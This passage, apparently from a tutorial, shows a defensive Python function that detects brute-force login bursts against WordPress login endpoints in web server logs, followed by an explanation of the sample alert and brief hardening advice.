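        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] not in LOGIN_PATHS:
            continue
        attempts[rec["ip"]].append(rec)

    alerts = []
    for ip, recs in attempts.items():
        recs.sort(key=lambda r: r["ts"])
        # Two-pointer sliding window: the largest number of POSTs within `window`.
        best, lo = 0, 0
        for hi in range(len(recs)):
            while recs[hi]["ts"] - recs[lo]["ts"] > window:
                lo += 1
            best = max(best, hi - lo + 1)
        if best < threshold:
            continue
        # wp-login.php answers a failed login with 200 and a successful one with 302.
        succeeded = any(r["path"] == "/wp-login.php" and r["status"] == 302 for r in recs)
        alerts.append({
            "ip": ip,
            "attempts": len(recs),
            "burst": best,
            "succeeded": succeeded,
            "paths": sorted({r["path"] for r in recs}),
        })
    return alerts


if __name__ == "__main__":
    for alert in find_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```

On the sample the single alert names 192.168.56.146 with six attempts, both login endpoints, and succeeded=True; the lone successful login from 192.168.56.1 stays below the threshold and is not reported. Rate-limiting wp-login.php and disabling xmlrpc.php where it is not needed close the same gap on the prevention side.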